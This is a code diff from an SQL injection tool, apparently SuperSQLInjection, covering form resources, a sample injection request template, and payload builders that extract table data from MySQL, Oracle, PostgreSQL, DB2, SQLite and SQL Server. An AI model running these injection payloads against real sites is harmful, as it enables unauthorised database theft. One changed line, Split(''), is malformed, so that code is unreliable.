TgDQASA1MVpwzwAAAABJRU5ErkJggg==
</value>
</data>
<data name="toolStrip_vers_btn_selectReverse.Image" type="System.Drawing.Bitmap, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>
iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8
YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG
YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9
0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw
bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc
VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9
c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32
Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo
mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+
kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D
TgDQASA1MVpwzwAAAABJRU5ErkJggg==
</value>
</data>
<metadata name="data_cms_vers.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>477, 17</value>
</metadata>
<metadata name="data_dbs_ts.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>17, 55</value>
</metadata>
<metadata name="toolStrip1.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>278, 55</value>
</metadata>
<metadata name="data_cms_dbs.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>613, 17</value>
</metadata>
<metadata name="imglist_database.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>388, 55</value>
</metadata>
<data name="imglist_database.ImageStream" mimetype="application/x-microsoft.net.object.binary.base64">
<value>
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACq
DQAAAk1TRnQBSQFMAgEBBwEAAegBCgHoAQoBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
AwABQAMAASADAAEBAQABCAYAAQgYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
AWYDAAGZAwABzAIAATMDAAIzAgABMwFmAgABMwGZAgABMwHMAgABMwH/AgABZgMAAWYBMwIAAmYCAAFm
AZkCAAFmAcwCAAFmAf8CAAGZAwABmQEzAgABmQFmAgACmQIAAZkBzAIAAZkB/wIAAcwDAAHMATMCAAHM
AWYCAAHMAZkCAALMAgABzAH/AgAB/wFmAgAB/wGZAgAB/wHMAQABMwH/AgAB/wEAATMBAAEzAQABZgEA
ATMBAAGZAQABMwEAAcwBAAEzAQAB/wEAAf8BMwIAAzMBAAIzAWYBAAIzAZkBAAIzAcwBAAIzAf8BAAEz
AWYCAAEzAWYBMwEAATMCZgEAATMBZgGZAQABMwFmAcwBAAEzAWYB/wEAATMBmQIAATMBmQEzAQABMwGZ
AWYBAAEzApkBAAEzAZkBzAEAATMBmQH/AQABMwHMAgABMwHMATMBAAEzAcwBZgEAATMBzAGZAQABMwLM
AQABMwHMAf8BAAEzAf8BMwEAATMB/wFmAQABMwH/AZkBAAEzAf8BzAEAATMC/wEAAWYDAAFmAQABMwEA
AWYBAAFmAQABZgEAAZkBAAFmAQABzAEAAWYBAAH/AQABZgEzAgABZgIzAQABZgEzAWYBAAFmATMBmQEA
AWYBMwHMAQABZgEzAf8BAAJmAgACZgEzAQADZgEAAmYBmQEAAmYBzAEAAWYBmQIAAWYBmQEzAQABZgGZ
AWYBAAFmApkBAAFmAZkBzAEAAWYBmQH/AQABZgHMAgABZgHMATMBAAFmAcwBmQEAAWYCzAEAAWYBzAH/
AQABZgH/AgABZgH/ATMBAAFmAf8BmQEAAWYB/wHMAQABzAEAAf8BAAH/AQABzAEAApkCAAGZATMBmQEA
AZkBAAGZAQABmQEAAcwBAAGZAwABmQIzAQABmQEAAWYBAAGZATMBzAEAAZkBAAH/AQABmQFmAgABmQFm
ATMBAAGZATMBZgEAAZkBZgGZAQABmQFmAcwBAAGZATMB/wEAApkBMwEAApkBZgEAA5kBAAKZAcwBAAKZ
Af8BAAGZAcwCAAGZAcwBMwEAAWYBzAFmAQABmQHMAZkBAAGZAswBAAGZAcwB/wEAAZkB/wIAAZkB/wEz
AQABmQHMAWYBAAGZAf8BmQEAAZkB/wHMAQABmQL/AQABzAMAAZkBAAEzAQABzAEAAWYBAAHMAQABmQEA
AcwBAAHMAQABmQEzAgABzAIzAQABzAEzAWYBAAHMATMBmQEAAcwBMwHMAQABzAEzAf8BAAHMAWYCAAHM
AWYBMwEAAZkCZgEAAcwBZgGZAQABzAFmAcwBAAGZAWYB/wEAAcwBmQIAAcwBmQEzAQABzAGZAWYBAAHM
ApkBAAHMAZkBzAEAAcwBmQH/AQACzAIAAswBMwEAAswBZgEAAswBmQEAA8wBAALMAf8BAAHMAf8CAAHM
Af8BMwEAAZkB/wFmAQABzAH/AZkBAAHMAf8BzAEAAcwC/wEAAcwBAAEzAQAB/wEAAWYBAAH/AQABmQEA
AcwBMwIAAf8CMwEAAf8BMwFmAQAB/wEzAZkBAAH/ATMBzAEAAf8BMwH/AQAB/wFmAgAB/wFmATMBAAHM
AmYBAAH/AWYBmQEAAf8BZgHMAQABzAFmAf8BAAH/AZkCAAH/AZkBMwEAAf8BmQFmAQAB/wKZAQAB/wGZ
AcwBAAH/AZkB/wEAAf8BzAIAAf8BzAEzAQAB/wHMAWYBAAH/AcwBmQEAAf8CzAEAAf8BzAH/AQAC/wEz
AQABzAH/AWYBAAL/AZkBAAL/AcwBAAJmAf8BAAFmAf8BZgEAAWYC/wEAAf8CZgEAAf8BZgH/AQAC/wFm
AQABIQEAAaUBAANfAQADdwEAA4YBAAOWAQADywEAA7IBAAPXAQAD3QEAA+MBAAPqAQAD8QEAA/gBAAHw
AfsB/wEAAaQCoAEAA4ADAAH/AgAB/wMAAv8BAAH/AwAB/wEAAf8BAAL/AgAD/wEAEP8wAA/vAf8PvAUA
AQcBcgFPA0kBcgEHFAAP7wH/D+8EAAGYAU8BUASYAU8BSQEcEwAB7w3/Ae8B/wHvDf8B7wMAAZgBTwF4
AQgBmAKXAZgBCAGXAUkBHBIAAe8B/wLcAv8C3AL/AtwC/wHvAf8B7wL/CdwC/wHvAgABBwFPAXgBCAaX
AQgBlwFJAQcRAAHvAf8C3AL/AtwC/wLcAv8B7wH/Ae8C/wncAv8B7wIAAXgBVgEIApcBeAEbAZgDlwEI
AU8BchEAAe8B/wLcAv8C3AL/AtwC/wHvAf8B7w3/Ae8CAAFQApgBlwF4A/8BmAKXApgBTxEAAe8B/wLc
Av8C3AL/AtwC/wHvAf8B7wL/CdwC/wHvAgABTwGYAZcBeAL/AfQC/wGYApcBmAFJEQAB7wH/AtwC/wLc
Av8C3AL/Ae8B/wHvAv8J3AL/Ae8CAAFVAQgBeAGXAQgB8QGXAQgC/wGYAZcBmAFPEQAB7w3/Ae8B/wHv
Df8B7wIAAVYCmAWXAQgB/wHzApgBTxEAAe8B9AvyAfQB7wH/Ae8B9AvyAfQB7wIAAZgBlwEIBpcBCAGX
AQgBUAGXEQABtA2zAbQB/wG0DbMBtAIAAQgBVgF4AQgGlwEIAXgBTwEHEQABswEJC9wBCQGzAf8BswEJ
C9wBCQGzAwABmAFWAXgBCAGYAngBmAEIAXgBTwGYEgABswHhC9sB4QGzAf8BswHhC9sB4QGzBAABmAFW
AZcEmAGXAVABmBMAAbMN4gGzAf8Bsw3iAbMFAAEIAZgEVgGYAQcUAA+zAf8Bug2zAbohABD/IAABEg5D
ARIB/w7UAf8gAAFtDv8BbQH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8BAA4HAgAIBwaXAQABbQH/
ARUEEQEQAxEBEAERARQB/wFtAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEAAQcC/wEHBP8BBwT/
AQcCAAEHAv8BBwT/AZcECAGXAQABbQH/AeoC/wG8A/8BvAP/AeoB/wFtAf8B1AIZAfQC/wH0ARkBCQPc
AQkB1AH/AQABBwL/AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAFtAf8B6gG8AQcBvAMHAbwCBwG8
AeoB/wFtAf8O1AH/AQAOBwIACAcGlwEAAesB/wFtAv8BvAP/AbwD/wFtAf8B6wH/AdQC3AEZAvQBGQHc
AdsB2gHTAdQB2wHUAf8BAAEHAv8BBwT/AQcE/wEHAgABBwL/AQcE/wGXBAgBlwEAAesB/wFtAfAIvAHw
AW0B/wHrAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEAAQcC/wEHBP8BBwT/AQcCAAEHAv8BBwT/
AZcECAGXAQAB6wH/AesC/wHwA/8B8AP/AesB/wHrAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEA
DgcCAAgHBpcBAAHrAf8B6wIZAfEG8gHzAesB/wHrAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AQABBwL/
AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAHsAf8BkQElASABGQcCAewB/wHsAf8O1AH/AQABBwL/
AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAHsAf8BkQImAfQBNAVVATQB7AH/AewB/wHUAtwBGQL0
ARkB3AHbAdoB0wHUAdsB1AH/AQAOMwIACDMGNAEAAewB/wHsARkI8wH0AewB/wHsAf8B1ALcARkC9AEZ
AdwB2wHaAdMB1AHbAdQB/wEAATMCNAEzATQCVQE0ATMBNAJVATQBMwIAATMCNAEzATQCVQc0AQAB7AH/
AewC/wHzA/8B8wP/AewB/wHsAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AQAOMwIACDMGNAEAAewB/wzs
Af8B7AH/DtQB/yAAAewO/wHsEP8gABDtAUIBTQE+BwABPgMAASgDAAFAAwABIAMAAQEBAAEBBgABARYA
A/8DAAT/BQABAQHwAQ8FAAEBAeABBwUAAQEBwAEDBQABAQGAAQEFAAEBAYABAQUAAQEBgAEBBQABAQGA
AQEFAAEBAYABAQUAAQEBgAEBBQABAQGAAQEFAAEBAYABAQUAAQEBwAEDBQABAQHgAQcFAAEBAfABDwUA
AQEC/wQABP8EAAT/BAABgAEBAYABAQQAAYABAQGAAQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGA
AQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGAAQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGA
AQEEAAGAAQEBgAEBBAAE/wQABP8CAAs=
</value>
</data>
<metadata name="cms_data_dbs_lvw_data.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>538, 55</value>
</metadata>
<metadata name="cms_dataPacks.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>138, 55</value>
<value>368, 55</value>
</metadata>
<data name="txt_inject_request.Text" xml:space="preserve">
<value>GET /access.asp?id=1&lt;Encode&gt; and#inject#&lt;/Encode&gt; HTTP/1.1
@@ -416,38 +413,38 @@ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev (http://sqlmap.org)
Connection: close</value>
</data>
<metadata name="toolStrip_proxyList.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>1253, 55</value>
<metadata name="retrySend_cm.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>146, 17</value>
</metadata>
<metadata name="toolStrip_proxyList.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>1253, 55</value>
<value>131, 93</value>
</metadata>
<metadata name="proxy_cms.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>1139, 55</value>
<value>17, 93</value>
</metadata>
<metadata name="bypass_lvw_replaceString_cms.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>1204, 17</value>
<value>17, 55</value>
</metadata>
<metadata name="scanInjectionURL_cms.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>1022, 17</value>
<value>1118, 17</value>
</metadata>
<metadata name="scanInjection_cms.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>864, 17</value>
<value>960, 17</value>
</metadata>
<metadata name="injectLog_cm.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>17, 17</value>
</metadata>
<metadata name="statusStrip1.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>729, 55</value>
<value>959, 55</value>
</metadata>
<metadata name="timer_status.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>850, 55</value>
<value>1080, 55</value>
</metadata>
<metadata name="timer_scanInjection.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>973, 55</value>
<value>1203, 55</value>
</metadata>
<metadata name="menuStrip_main.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>329, 17</value>
<value>425, 17</value>
</metadata>
<metadata name="$this.TrayHeight" type="System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
<value>107</value>

6
SuperSQLInjection/Properties/AssemblyInfo.cs
View File

@@ -10,7 +10,7 @@ using System.Runtime.InteropServices;
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("www.shack2.org")]
[assembly: AssemblyProduct("超级SQL注入工具")]
[assembly: AssemblyCopyright("Copyright © 2014-2019")]
[assembly: AssemblyCopyright("Copyright © 2014-2020")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
@@ -32,5 +32,5 @@ using System.Runtime.InteropServices;
// 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值,
// 方法是按如下所示使用“*”:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.2019.09.01")]
[assembly: AssemblyFileVersion("1.2019.09.01")]
[assembly: AssemblyVersion("1.2020.02.09")]
[assembly: AssemblyFileVersion("1.2020.02.09")]

19
SuperSQLInjection/bypass/StringReplace.cs
View File

@@ -11,10 +11,25 @@ namespace SuperSQLInjection.bypass
{
class StringReplace
{
public static String strReplaceCenter(Config config, String request, Hashtable replaceList)
public static String lastRand = "";
public static String lastpayload = "";
public static String strReplaceCenter(Config config, String request, Hashtable replaceList,String payload)
{
//修改随机值
request = Regex.Replace(request, "(\\<Rand\\>[.\\s\\S]*?\\<\\/Rand\\>)", System.Guid.NewGuid().ToString("N"));
String rand = "";
if (payload.Equals(lastpayload)) {
rand = lastRand;
}
else {
rand = System.Guid.NewGuid().ToString("N");
}
if (payload.Equals("请求二次注入页面")) {
rand = lastRand;
}
request = Regex.Replace(request, "(\\<Rand\\>[.\\s\\S]*?\\<\\/Rand\\>)", rand);
lastRand = rand;
lastpayload = payload;
//找到需要处理的字符
MatchCollection mc = Regex.Matches(request, "(?<=(\\<Encode\\>))[.\\s\\S]*?(?=(\\<\\/Encode\\>))");
String str="";

3
SuperSQLInjection/model/Config.cs
View File

@@ -25,6 +25,7 @@ namespace SuperSQLInjection.model
public int threadSize = 1;
public int reTry = 2;
public String encoding = "UTF-8";
public String cmd_encoding = "UTF-8";
public String request = "";
public String sencondRequest = "";
public String key = "";
@@ -74,7 +75,7 @@ namespace SuperSQLInjection.model
public Boolean useBetweenByPass = false;//between绕过
public Boolean usehex = false;//hex绕过
public Boolean useUnicode = false;//uniocde绕过
public String retryKey = "";//重新发包的关键字
//scan
public int level = 0;
public int linkCount = 1;

9
SuperSQLInjection/payload/Comm.cs
View File

@@ -1,11 +1,17 @@
using System;
using System.Collections.Generic;
using System.Text;
using tools;
namespace SuperSQLInjection.payload
{
class Comm
{
public const String COLUMNS_SPLIT_STR = "$\t$";
public const String COLUMNS_REG_SPLIT_STR = "\\$\\t\\$|\\$\\\\t\\$";
public static String COLUMNS_SPLIT_HEX_STR = Tools.strToHex(COLUMNS_SPLIT_STR, "UTF-8");
public static String exists_table = " exists(select 1 from {0})";
public static String exists_column = " exists(select {0} from {1})";
public static String truePayload = " 1=1";
@@ -16,8 +22,7 @@ namespace SuperSQLInjection.payload
StringBuilder sb = new StringBuilder();
foreach (String column in columns)
{
sb.Append(column + unionStr);
sb.Append(column + unionStr);
}
sb.Remove(sb.Length - unionStr.Length, unionStr.Length);
return sb.ToString();

2
SuperSQLInjection/payload/DB2.cs
View File

@@ -82,7 +82,7 @@ namespace SuperSQLInjection.payload
public static String getUnionDataValue(String unionFileTemplate, List<String> columns, String dbname, String table, String index)
{
String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns,"||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns,"||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
String template= unionFileTemplate.Replace("{data}", (data_no_cast_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index)));
return union_value.Replace("{data}", template);
}

2
SuperSQLInjection/payload/Informix.cs
View File

@@ -38,7 +38,7 @@ namespace SuperSQLInjection.payload
public static String substr = "substr(({data})),{index},1)";
//多字节
public static String hex_value = "ascii({data})";
//public static String hex_value = "ascii({data})";
//bool方式字符长度判断
public static String bool_length = " length(({data}))>{len}";

6
SuperSQLInjection/payload/MySQL.cs
View File

@@ -219,7 +219,7 @@ namespace SuperSQLInjection.payload
public static String creatMySQLColumnsStr(List<String> columns, String table, String dbName, int limit)
{
StringBuilder sb = new StringBuilder("(select concat_ws(0x242424,");
StringBuilder sb = new StringBuilder("(select concat_ws("+ Comm.COLUMNS_SPLIT_HEX_STR + ",");
foreach (String c in columns) {
sb.Append("ifnull("+c + ",0x20),");
}
@@ -260,7 +260,7 @@ namespace SuperSQLInjection.payload
/// <returns></returns>
public static String concatMySQLColumnStr(List<String> columns)
{
StringBuilder sb = new StringBuilder("concat(0x5e5e21,concat_ws(0x242424,");
StringBuilder sb = new StringBuilder("cast(concat(0x5e5e21,concat_ws(" + Comm.COLUMNS_SPLIT_HEX_STR + ",");
for (int i = 0; i < columns.Count; i++)
{
if (columns.Count > 1)
@@ -278,7 +278,7 @@ namespace SuperSQLInjection.payload
{
sb.Remove(sb.Length - 1, 1);
}
sb.Append("),0x215e5e)");
sb.Append("),0x215e5e) as char)");
return sb.ToString();

4
SuperSQLInjection/payload/Oracle.cs
View File

@@ -91,7 +91,7 @@ namespace SuperSQLInjection.payload
public static String getUnionDataValue(int columnsLen, int showIndex, List<String> columns, String dbname, String table, String index)
{
StringBuilder sb = new StringBuilder();
String data = "chr(94)||chr(94)||chr(33)||" + Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
String data = "chr(94)||chr(94)||chr(33)||" + Comm.unionColumns(columns, "||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
@@ -163,7 +163,7 @@ namespace SuperSQLInjection.payload
public static String getDataValue(List<String> columns, String dbName, String table, String index)
{
StringBuilder sb = new StringBuilder();
String data = Comm.unionColumns(columns, "||chr(36)||chr(36)||chr(36)||");
String data = Comm.unionColumns(columns, "||chr(36)||chr(9)||chr(36)||");
sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index));
sb.Append(",");
sb.Remove(sb.Length - 1, 1);

6
SuperSQLInjection/payload/PostgreSQL.cs
View File

@@ -81,7 +81,7 @@ namespace SuperSQLInjection.payload
//error方式
public static String error_value = " 1=cast((chr(94)||chr(94)||chr(33)||({data})||chr(33)||chr(94)||chr(94)) as numeric)";
public static String hex = "(select hex({data}))";
//public static String hex = "(select hex({data}))";
public static String hex_value = "(select hex(convert(({data}) using UTF8)))";
public static String substr_value = "(select substr({data},{start},{len}))";
@@ -126,7 +126,7 @@ namespace SuperSQLInjection.payload
/// <param name="index">第几行数据1开始</param>
public static String getErrorDataValue(String dbname, String table, int index, List<String> columns)
{
String data = data_value.Replace("{columns}", unionColumns(columns, "||chr(36)||chr(36)||chr(36)||"));
String data = data_value.Replace("{columns}", unionColumns(columns, "||chr(36)||chr(9)||chr(36)||"));
String d = data.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index.ToString());
return error_value.Replace("{data}", d);
}
@@ -179,7 +179,7 @@ namespace SuperSQLInjection.payload
public static String getUnionDataValue(int columnsLen, int showIndex, List<String> columns, String dbname, String table, String index)
{
StringBuilder sb = new StringBuilder();
String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns, "||chr(36)||chr(36)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
String data = "chr(94)||chr(94)||chr(33)||" + unionColumns(columns, "||chr(36)||chr(9)||chr(36)||") + "||chr(33)||chr(94)||chr(94)";
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)

22
SuperSQLInjection/payload/SQLServer.cs
View File

@@ -64,8 +64,6 @@ namespace SuperSQLInjection.payload
//解决存在textBINARY等多种数据类型时存在空值sql报错无法获取数据的问题
public static String data_value = "(select top 1 {data} from (select top {index} * from [{dbname}]..[{table}] order by {orderby}) t order by {orderby} desc for xml raw,binary base64)";
//union获取值
public static String union_value = " 1=2 union all select {data}";
@@ -217,8 +215,8 @@ namespace SuperSQLInjection.payload
/// <param name="index">第几行数据1开始</param>
public static String getErrorDataValue(String dbname, String table,int index,List<String> columns)
{
String data = data_value.Replace("{data}", concatAllColumnsByConcatStr(columns)).Replace("{allcolumns}", concatAllColumns(columns)).Replace("{orderby}", columns[0]);
String d = data.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{column}", concatAllColumnsByConcatStr(columns)).Replace("{index}", index.ToString());
String data = data_value.Replace("{data}", Comm.unionColumns(columns,",")).Replace("{orderby}", columns[0]);
String d = data.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index.ToString());
return error_value.Replace("{data}", d);
}
@@ -238,22 +236,6 @@ namespace SuperSQLInjection.payload
sb.Remove(sb.Length - 1, 1);
return sb.ToString();
}
/// <summary>
/// 多字段拼接,带连接符
/// </summary>
/// <param name="columns"></param>
/// <returns></returns>
public static String concatAllColumnsByConcatStr(List<String> columns)
{
StringBuilder sb = new StringBuilder();
foreach (String column in columns)
{
sb.Append("cast(isnull(" + column + ",space(1)) as varchar(5000))+char(36)+char(36)+char(36)+");
}
sb.Remove(sb.Length - 28, 28);
return sb.ToString();
}
/// <summary>
/// 获得bool方式值payload

2
SuperSQLInjection/payload/SQLite.cs
View File

@@ -52,7 +52,7 @@ namespace SuperSQLInjection.payload
public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, List<String> columns, String table, String index)
{
StringBuilder sb = new StringBuilder();
String data = "char(94)||char(94)||char(33)||" + unionColumns(columns, "||char(36)||char(36)||char(36)||") + "||char(33)||char(94)||char(94)";
String data = "char(94)||char(94)||char(33)||" + unionColumns(columns, "||char(36)||char(9)||char(36)||") + "||char(33)||char(94)||char(94)";
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)

10
SuperSQLInjection/scan/Spider.cs
View File

@@ -76,10 +76,7 @@ namespace SuperSQLInjection.scan
{
continue;
}
if (curl.Contains(".css") || curl.Contains(".js") || curl.Contains(".jpg") || curl.Contains(".png") || curl.Contains(".ico") || curl.Contains(".gif"))
{
continue;
}
curl = curl.Replace("&amp;", "&");
if (curl.StartsWith("//"))
{
@@ -111,6 +108,11 @@ namespace SuperSQLInjection.scan
try
{
Uri cu = new Uri(curl);
String cupath = cu.AbsolutePath;
if (cupath.EndsWith(".css") || cupath.EndsWith(".js") || cupath.EndsWith(".jpg") || cupath.EndsWith(".png") || cupath.EndsWith(".ico") || cupath.EndsWith(".gif"))
{
continue;
}
if (!AllURL.Contains(curl) && !AllNoParamaValURL.Contains(noValURL)&&AllURL.Count<config.maxSpiderCount)
{
AllURL.Add(curl);

10
SuperSQLInjection/tools/InjectionTools.cs
View File

@@ -80,8 +80,8 @@ namespace SuperSQLInjection.tools
String curl = uri.PathAndQuery.Replace(param, payload);
injection.testUrl = testUrl.Replace(param, payload);
injection.paramName = sprarm[0];
String oldrequest = Spider.reqestGetTemplate.Replace("{url}", uri.PathAndQuery).Replace("{host}", uri.Host + ":" + uri.Port);
String request = Spider.reqestGetTemplate.Replace("{url}", curl).Replace("{host}", uri.Host + ":" + uri.Port);
String oldrequest = Spider.reqestGetTemplate.Replace("{url}", uri.PathAndQuery).Replace("{host}", uri.Host);
String request = Spider.reqestGetTemplate.Replace("{url}", curl).Replace("{host}", uri.Host);
//通过错误显示判断
if (timeout >= 3)
{
@@ -129,7 +129,7 @@ namespace SuperSQLInjection.tools
foreach (String bool_payload in bool_payloads)
{
String[] bool_ps = bool_payload.Split(':');
String[] bool_ps = bool_payload.Split('');
String flasePayload = pramName + "=" + URLEncode.UrlEncode(pramValue + bool_ps[1]);
String falseURL = uri.PathAndQuery.Replace(param, flasePayload);
@@ -139,7 +139,7 @@ namespace SuperSQLInjection.tools
{
break;//超时3次认为此URL为坏死URL
}
String falserequest = Spider.reqestGetTemplate.Replace("{url}", falseURL).Replace("{host}", uri.Host + ":" + uri.Port);
String falserequest = Spider.reqestGetTemplate.Replace("{url}", falseURL).Replace("{host}", uri.Host);
ServerInfo falseServer = HTTP.sendRequestRetry(isSSL, config.reTry, uri.Host, uri.Port, flasePayload, falserequest, config.timeOut, HTTP.AutoGetEncoding, false, config.redirectDoGet);
if (falseServer.runTime > config.timeOut * 1000) timeout++;
decimal pfalse = Tools.getLike(oserver.body, falseServer.body);
@@ -151,7 +151,7 @@ namespace SuperSQLInjection.tools
String truePayload = pramName + "=" + URLEncode.UrlEncode(pramValue + bool_ps[0]);
String trueURL = uri.PathAndQuery.Replace(param, truePayload);
String truerequest = Spider.reqestGetTemplate.Replace("{url}", trueURL).Replace("{host}", uri.Host + ":" + uri.Port);
String truerequest = Spider.reqestGetTemplate.Replace("{url}", trueURL).Replace("{host}", uri.Host);
if (timeout >= 3)
{
break;//超时3次认为此URL为坏死URL

2
SuperSQLInjection/tools/Tools.cs
View File

@@ -498,7 +498,7 @@ namespace tools
case KeyType.Time:
//由于计数器有误差(可能客户端计数小于服务端,如果页面正常响应时间非常快,可能导致返回时间可能提前,所以考虑设置一个误差值)
//由于计数器有误差(可能客户端计数小于服务端,如果页面正常响应时间非常快,可能导致返回时间可能提前,所以考虑设置一个误差值)
int time = Tools.convertToInt(key);
if (server.runTime > (time*1000-(time*deviation)))
{

70
SuperSQLInjection/tools/http/HTTP.cs
View File

@@ -36,13 +36,13 @@ namespace SuperSQLInjection.tools
public const String Transfer_Encoding = "transfer-encoding";
public const String Connection = "connection";
public const String Content_Length_Zero= "Content-Length: 0";
public const String Content_Length_Zero = "Content-Length: 0";
public const String ConnectionClose = "connection: close";
